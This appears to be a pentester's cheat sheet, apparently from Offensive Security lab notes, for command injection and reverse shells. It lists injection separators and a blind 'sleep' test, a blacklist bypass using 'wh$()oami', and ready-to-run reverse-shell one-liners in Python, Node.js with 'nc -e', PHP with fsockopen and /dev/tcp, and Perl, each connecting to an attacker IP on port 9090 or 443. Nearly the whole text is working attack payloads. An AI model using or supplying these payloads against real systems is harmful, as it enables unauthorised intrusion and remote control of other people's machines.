Tips:
- Remember to URL encode characters (especially
&) if not they will break the payload. - To escape double quotes in PHP inside double quotes, insert a backslash
\before the double quotes that is inside. - World writable directories:
/tmp,/var/tmp,/dev/shm - Found SSH keys? chmod 600, and need to have empty line at the end to make it work.
Operating System
Pipe:
|id
Semicolon (simultaneous run):
;id
&& (only run if the first command works):
&& id
Logical Or (only run if first command fails):
|| id
Linux only (wrapping command):
id
$(id)
Blind injection cases:
;sleep 10
Linux specific tips:
To bypass blacklist can use null statement $(), for example wh$()oami will work as whoami.
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Node.js
echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js
PHP
php -r '$sock=fsockopen("192.168.45.199",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.199",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.45.199/443 0>&1'\");" Diagnose using phpinfo(), not a shell:
php -r 'phpinfo();'
Perl
perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'